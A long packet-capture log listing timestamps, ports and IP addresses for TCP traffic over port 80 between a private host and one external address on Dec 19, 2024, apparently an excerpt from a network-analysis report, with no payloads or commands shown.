Dec 19, 2024 08:47:37.758462906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.758477926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.758516073 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.759248018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.759255886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.759321928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.760056019 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.760063887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.760106087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.909403086 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.909878969 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.909888029 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.909949064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.910048008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.910115957 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.910371065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.910917997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.911017895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.911454916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.911798000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.911865950 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.912159920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.912168026 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.912259102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.912883043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.913409948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.913417101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.913569927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.913882971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.913959026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.914252996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.914602041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.914674044 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.914984941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.914990902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.915051937 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.915754080 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.917478085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.917488098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.917546034 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.919851065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.919857979 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.919869900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.919876099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.919882059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.919888973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.919939995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.919939995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.920521021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.920528889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.920577049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.920818090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.920933008 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.921317101 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.921324968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.921364069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.922215939 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.922838926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.922846079 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.922983885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.923536062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.923542976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.923619986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.924158096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.924206018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.924335957 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.924684048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.924782991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.925190926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.925199986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.925271988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.925666094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.925673962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.925759077 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.926336050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.926762104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.926824093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.927083015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.927090883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.927141905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.927733898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.928103924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.928216934 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.928476095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.928824902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.928878069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.929291010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.929689884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.929743052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.930000067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.930339098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.930423975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.930727959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.931025982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.931099892 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.931741953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.932039976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.932132006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.932562113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.932811975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.932936907 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.933207035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.933213949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.933278084 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.933880091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.934220076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.934338093 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.934808016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.934947968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.935055971 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.935451031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.935652018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.935764074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.936242104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.936439991 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.936512947 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.937099934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.937345028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.937431097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.937902927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.938271999 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.938550949 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.938673973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.939177990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.939279079 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.939542055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.939726114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.939790010 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.940242052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.940249920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.940304995 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.941323996 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.941330910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.941401958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.941910982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.941917896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.941998005 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.942590952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.942781925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.942837000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.943392992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.943399906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.943576097 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.944176912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.944376945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.944427967 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.945105076 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.945460081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.945561886 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.945801020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.946160078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.946286917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.946574926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.946877003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.946944952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.947551012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.948100090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.948354006 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.948359013 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.948363066 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.948486090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.949351072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.949672937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.949783087 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.950062037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.950069904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.950164080 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:37.950692892 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:37.997222900 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.101411104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.101567030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.101639032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.101895094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.102250099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.102319002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.102600098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.102976084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.103039026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.103652000 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.103976965 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.104021072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.104342937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.104356050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.104398966 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.105041027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.105604887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.105669022 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.105792046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.106154919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.106276989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.106498003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.106836081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.106921911 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.107333899 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.107347012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.107403040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.108078003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.108397961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.108486891 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.108932018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.109052896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.109114885 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.109630108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.109980106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.110037088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.110429049 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.110616922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.110661030 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.111228943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.111890078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.111943007 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.112113953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.112126112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.112205982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.112834930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.113118887 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.113188982 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.113605976 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.114058018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.114114046 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.114399910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.114573956 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.114638090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.115168095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.115369081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.115448952 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.115963936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.116137028 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.116192102 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.116687059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.116895914 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.117010117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.117614031 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.117755890 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.117886066 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.118289948 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.118488073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.118535042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.119046926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.119257927 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.119332075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.119837046 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.120029926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.120182991 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.120676041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.120687962 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.120757103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.121509075 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.121680021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.121741056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.122231007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.122440100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.122497082 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.122987986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.123189926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.123320103 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.124633074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.125566959 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.125618935 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.127727032 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.128453016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.128473997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.128485918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.128535032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.128535032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.129225016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.129245043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.129293919 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.130044937 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.130058050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.130184889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.130774021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.130794048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.130856037 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.131580114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.131594896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.131604910 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.131686926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.132370949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.132385015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.132477045 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.133125067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.133145094 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.133172035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.133876085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.133919954 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.133933067 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.134654045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.134680986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.134702921 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.135463953 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.135478020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.135489941 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.135524035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.135524988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.136157990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.136171103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.136231899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.136929035 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.136943102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.136980057 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.137554884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.137567997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.137623072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.138264894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.138278008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.138322115 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.138956070 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.138969898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.139030933 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.139698982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.139705896 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.139766932 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.140341997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.140357018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.140408039 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.141057014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.141071081 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.141124964 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.141741037 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.141752958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.141815901 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.142429113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.142442942 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.142477989 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.143132925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.143145084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.143233061 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.143824100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.184693098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.293560982 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.293735981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.293816090 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.294079065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.294537067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.294599056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.294783115 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.294795990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:38.294842958 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:38.295464039 CET	80	49707	194.87.47.113	192.168.2.7
